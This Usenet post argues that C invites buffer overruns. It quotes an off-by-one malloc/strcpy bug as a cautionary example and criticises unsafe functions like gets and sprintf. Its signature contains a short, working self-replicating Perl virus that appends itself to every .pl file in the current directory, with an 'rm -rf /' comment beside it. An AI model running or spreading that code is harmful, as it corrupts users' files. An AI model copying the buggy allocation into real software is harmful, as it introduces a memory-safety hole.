Re: Which programming languages in NGE?

Scripsit illa aut ille David Scarlett <look@my.signature>:
> Rudolf Polzer <AntiATField_adsgohere@durchnull.de> wrote in
> news:slrnahtpg5.5i7.AntiATField_adsgohere@www42.durchnull.de: 
> 
> >> > But probably both C and the current XML will disappear. 
> 
> What makes you think that? C has been around for over 30 years and is 
> still very much alive and kicking....

C is undergoing too many changes. Three widely used standards.

C++ will have a better chance to stay, but I cannot really say C will
disappear. Most C++ compilers will stay being able to compile C since
this feature is not much to add to a C++ compiler. It's just that the
number of users of C will decrease to a small minority.

> > And C is the only of today's
> > languages I would like seeing disappearing because it caused too
> > many security holes (buffer overrun).
> 
> Buffer overruns aren't caused by C. They're caused by incompetence. 
> People who don't know why gets() is dangerous shouldn't be using C...

That's what someone in de.comp.security.misc wrote (I hope you see the
mistake):

| char *ptr = malloc (strlen(source));
| if (!ptr) exit (EXIT_FAILURE);
| strcpy (ptr,source);
| /*     Wer das nicht kann, sollte IMHO gar nicht C programmieren.     */
(If you can't do this, you shouldn't use C)

It happens just too easily because C does not have a string datatype
that does these things for you.

A simple

#define stralloc(N) calloc ((N) + 1, 1)

(when using calloc, the string returned has zero length, so other
mistakes are avoided)

and this mistake would have gone. Why isn't that in <stdlib.h>?

Then there are no variable-length arrays on the stack. You cannot write

void f (unsigned int n)
{
  char a[n];
  /* ... */
}

Having to use malloc all the time is memory-leak-prone, especially
because there is no better exception handling than atexit() and
longjmp(). This would be another good thing for C:

void f (unsigned int n)
{
  char *a = malloc (n);
  do
  {
    /* ... */
    for (/* ... */)
    {
      /* ... */
      if (somethingstrangehappened)
        return;
    }
    /* ... */
  }
  onreturn /* only executed when using return */
  {
    puts ("something strange happened");
  }
  onleave /* always executed after leaving the block, using return or
             regularily */
  {
    free (a);
  }
  puts ("do block did not use return");
}

(onreturn/onleave should even work when exiting from the block using return
- I know this would be a hassle to implement, but in every return the
compiler knows the chain of onexit blocks to execute so it could compile
them as functions and call them like functions before generating the RET,
so it's still simpler than exception handling)

And gets() is not the only such function. sprintf, *scanf etc. are just
as dangerous and especially for sprintf there is no safe ANSI C
replacement - snprintf has been introduced in C99 which many programmers
avoid for compatibility to older compilers and the really safe asprintf
(using this you don't have to worry about buffer sizes, therefore you
cannot make a mistake using it) is a GNU extension, not even C99.

Another flaw is that 'unsigned' is a longer word than 'int', therefore
many programmers use signed integers where unsigned ones are correct.
Turbo Pascal did this right, 'integer' was longer than 'word'...


-- 
#!/usr/bin/perl -- WARNING: Be careful. This is a virus!!! # rm -rf /
eval($0=q{$0="\neval(\$0=q{$0});\n";for(<*.pl>){open X,">>$_";print X
$0;close X;}print''.reverse"\nsuriv lreP trohs rehtona tsuJ>RH<\n"});
####################### http://learn.to/quote #######################